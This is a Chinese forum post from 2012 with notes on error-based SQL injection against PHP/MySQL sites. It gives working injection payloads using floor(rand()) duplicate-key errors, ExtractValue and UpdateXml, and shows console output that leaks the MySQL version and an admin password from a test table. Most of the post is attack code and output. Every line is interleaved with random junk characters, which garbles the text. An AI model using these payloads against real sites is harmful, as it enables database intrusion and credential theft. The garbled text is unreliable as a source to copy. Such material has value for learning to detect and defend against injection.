放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
- ~. Q& T; h3 t. ^$ G) _+ I% X7 ]实际测试环境:
8 g0 V4 q* [! W. D, P
" I; @; `. p9 u* h
4 d9 E6 G) a% Y1 t Umysql> show tables;$ E5 }7 T6 N/ K+ |* n& m
+----------------+
2 P- _2 s$ T' z2 M! [- S& X| Tables_in_test |' ?3 e2 U' |: z7 d" F1 a
+----------------+
/ k2 g7 m/ ^& x& r3 N| admin |9 w: o: V0 Z4 z
| article |
9 g6 H( ~/ h- V7 B$ ~& E+ f+----------------+! n5 F) z* A, |
: E4 K0 h. h" W! K: \
0 A$ m9 h4 y, r
5 L( R( R- e# b1 U* }mysql> describe admin;
5 \& O, c' h1 l. V: Q0 v. ^; O+-------+------------------+------+-----+---------+----------------+/ Q* u& O8 L+ W5 j
| Field | Type | Null | Key | Default | Extra |
/ [' `1 _. f: x8 D+-------+------------------+------+-----+---------+----------------+ w+ k# a' l0 _+ q
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
' c. X+ J: b2 v4 h| user | varchar(50) | NO | | NULL | |
) L+ `6 {) ^+ V. {| pass | varchar(50) | NO | | NULL | |, E# T- }; h7 Z5 d9 O
+-------+------------------+------+-----+---------+----------------+
- Y' h0 a; w9 A* v% Z ; r9 f6 L! e, L) w5 Q/ I
! x- Y6 z( ?4 w, W6 W4 G j
4 k" @! R0 ? `4 ?. g" C
mysql> describe article;
7 k% {; Z3 i. |" X+---------+------------------+------+-----+---------+----------------+
7 f0 i' g% E/ h. ]| Field | Type | Null | Key | Default | Extra |; y8 E6 w" C( h% A8 v# O
+---------+------------------+------+-----+---------+----------------+
' r: t; ]3 O5 {| id | int(10) unsigned | NO | PRI | NULL | auto_increment |+ ~1 I+ k5 Q5 [( [8 L; o' L- f3 o
| title | varchar(50) | NO | | NULL | |
) D3 K# n" H, e. d- m' Q% l" }% o| content | varchar(50) | NO | | NULL | |
7 c% ?/ i0 L$ F- }2 }3 j d+---------+------------------+------+-----+---------+----------------+
# }3 S: S. b0 X" [; _. O1、通过floor报错
9 r, E+ W3 s) P, s# a$ {- I可以通过如下一些利用代码
) ?+ r, z! Y/ C8 U 6 O1 n! f l7 V$ S1 r
; u& R, \+ ~2 X- o! r9 m- K' oand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x! l, a+ a: @& O. H6 e4 q# ]
from information_schema.tables group by x)a);( q' q" b2 [: x6 k
7 v) W. @6 ]0 q0 R1 H4 d! @ # _# Z p' X2 B
and (select count(*) from (select 1 union select null union select !1)x- G6 ^2 r8 m$ ]. G+ I) H: H
group by concat((select table_name from information_schema.tables limit 1),: B0 F b1 | m2 O0 M
floor(rand(0)*2)));
% a- \& C+ S7 ^5 ~5 W2 B: Z; O( i( }举例如下:
4 C. C9 c- `" S首先进行正常查询:
" ~$ q: q( Q+ z; d . a1 E' W C, o7 E2 s/ F* k5 c7 P
mysql> select * from article where id = 1;
" f" }' D, f$ q# r! v, r) V6 J- Z+----+-------+---------+- n3 k* F) o( e- z0 t% K
| id | title | content |
8 M# u, Z# Q8 c1 V1 b3 a1 T' _6 ~+----+-------+---------+
# U A+ ^9 r/ v6 U9 s- ?8 Y9 s| 1 | test | do it |2 [+ y% x6 \& S* X# ]
+----+-------+---------+2 j7 I4 E' R' }! H" R3 [
假如id输入存在注入的话,可以通过如下语句进行报错。/ t: C: J2 M* K e
# j( c9 t" P, N# Y. Z3 e
2 u$ ?- `5 V1 i9 h1 w5 j% A) r
mysql> select * from article where id = 1 and (select 1 from
4 \. C+ g, Q! d9 W. V a% X/ H" h' a(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
6 u: H% i! s1 b% N' ~/ bERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'8 @* {' b5 D- K
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
5 t# K- [* u8 G4 w; V; z例如我们需要查询管理员用户名和密码:3 `$ B4 G6 R0 [ {
Method1:
* y$ \ l& ^6 Y, i* N
3 D9 n- c/ r4 T
5 I' c5 Y! b( n9 Tmysql> select * from article where id = 1 and (select 1 from) `; e8 q( e5 R( ~+ h
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
* |7 G2 l6 b+ H, Z& d9 Mfrom information_schema.tables group by x)a);
0 ?. p7 b& }4 ] M8 U% b% K& t7 J9 dERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'# e( e! S! s. K: {
Method2:. P& \* S/ C( V4 T8 \% _9 G
0 J/ x: M$ Q* I5 N
( z. b, v6 U4 a3 Omysql> select * from article where id = 1 and (select count(*)
; Z5 M3 E1 G& D( ^ ~from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
5 G! l( M" Q- S1 A" d" C; Kfloor(rand(0)*2)));
& ?% Q3 w+ t. ]3 F A2 CERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
; J' _& q) q& A- C5 w2、ExtractValue; g8 }2 f s7 a. B9 [9 X
测试语句如下. o( C4 A2 O/ j) p
9 Z" g' l, X' S$ P8 w) N ( r( e5 h) [( Z5 ?6 l
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));) {- l5 u* X; `! P( w) X z3 P
实际测试过程
* D9 V' `: t" k. P, S5 l9 f. [6 g1 b
1 W0 Q* ~9 r0 ~" ?2 B) u. X; o , E0 t" U) F9 v' l9 q2 n2 u5 i
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,% x* V% \1 `* a, W4 e6 e
(select pass from admin limit 1)));--
5 u2 P: `- j2 d. F! iERROR 1105 (HY000): XPATH syntax error: '\admin888'
4 L( f K- X$ u3 u e3、UpdateXml
" r: c$ u+ R: M4 M. \3 I测试语句; G8 q3 s% y3 u: r$ C j
. v0 \* |2 T: Q! G, ?# L* k + h5 L& T0 n; T: Z, U1 N
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
" [& _1 Z" @ @) _0 P" \6 W实际测试过程
2 N4 x( t0 E1 m1 N2 p& E5 |& ~ ! M9 u% [: b2 K9 U& y! T; T
3 \; L' y7 l3 Z* Y" U' |2 h5 m2 Vmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,; X5 I. i( ^6 O! P
(select pass from admin limit 1),0x5e24),1));% M$ ~9 }- X1 B1 j2 r. i
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
4 P9 S" @/ i! l: n. wAll, thanks foreign guys.. \; ?& t# w9 n1 `& M
/ G, E) ~$ e- r( W3 u
/ _. K" ?. Z* g+ K( f; T |
发表于 2012-12-10 10:28:51
收藏
支持
反对